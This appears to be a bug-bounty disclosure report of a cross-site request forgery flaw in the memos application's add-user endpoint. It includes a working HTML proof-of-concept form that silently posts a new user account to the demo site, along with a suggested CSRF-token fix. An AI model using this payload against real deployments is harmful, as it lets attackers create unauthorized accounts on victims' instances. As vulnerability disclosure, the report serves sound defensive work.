Cross-Site Request Forgery (CSRF) in Add Users in usememos/memos
Reported on
Dec 28th 2022
Description
Hello Team,
Create a member functionality is vulnerable for CSRF Attack , by exploiting CSRF vulnerability , attacker can add new Members
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.usememos.com/api/user" method="POST" enctype="text/plain">
<input type="hidden" name="{"username":"corry","password":"corry","role":"USER"}" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
POC video: https://drive.google.com/file/d/1dN2ug8qjwbz1CGbfuBldwam_IFE4BNyH/view?usp=sharing
Fix: I just want to suggest you to set a CSRF token .
Impact
Attacker can Add New members in Portal by exploiting the CSRF issue.
SECURITY.md
exists
a year ago